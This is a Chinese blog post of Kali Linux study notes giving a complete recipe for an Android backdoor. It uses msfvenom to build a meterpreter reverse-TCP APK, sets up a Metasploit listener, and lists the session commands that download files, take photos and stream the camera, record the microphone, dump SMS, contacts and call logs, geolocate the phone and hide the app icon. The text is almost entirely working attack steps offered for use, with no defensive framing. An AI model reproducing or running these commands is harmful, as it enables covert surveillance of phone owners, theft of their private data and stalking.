kali的学习笔记篇(六)metasploit之安卓后门

环境:
kali-linux-2018.-2-amd-64.iso
android
支持外网监听

0x01:
//生成安卓木马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=[myIP] LPORT=55555 R > [akpNAME].apk
0x02:
//加载攻击模块
use exploit/multi/handler
//设置tcp反向链接,装载攻击载荷
set PAYLOAD android/meterpreter/reverse_tcp
//反弹会话
set LHOST [myIP]
//反弹端口,越大越好
set LPORT [myPORT]
//执行监听
exploit

0x03:
/*在手机上安装或打开app就会获取一个tcp反弹会话。
查看会话有哪些操作*/
help
//搜索手机上的文件
search [-parameter]
//搜索图片
search -f *.jpg
//复制文件名
download [FILE NAME]

//拍照
webcam_snap -i 2
//在线播放摄像头
webcam_stream -i 2
//录音,要权限 -d 录音时长
record_mic -d 10
//与对方视频通话
webcam_chat
/*浏览器要求:
Chrome:23版或更新版
火狐:版本22或NEWE
如果目标手机没有以上浏览器返回错误。
*/

//列出手机上的摄像头
webcam_list
/*常用模块
 -i参数指定前后置摄像头,缺省为1(后置)2(前置)*/
webcam_stream -i 2
// 获取手机短信,需要权限
dump_sms
//获取定位信息,权限
geolocate 
//根据wlan获取定位信息,权限
wlan_geolocate
//获取联系人列表,要权限
dump_contacts
//获取通话记录,要权限
dump_calllog
//隐藏图标
hide_app_icon
//获取系统信息
sysinfo
//监测是否root权限
check_root


阅读更多
版权声明:不关注我就偷文章我打屎你!! https://blog.csdn.net/qq_34886247/article/details/81592967
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭
关闭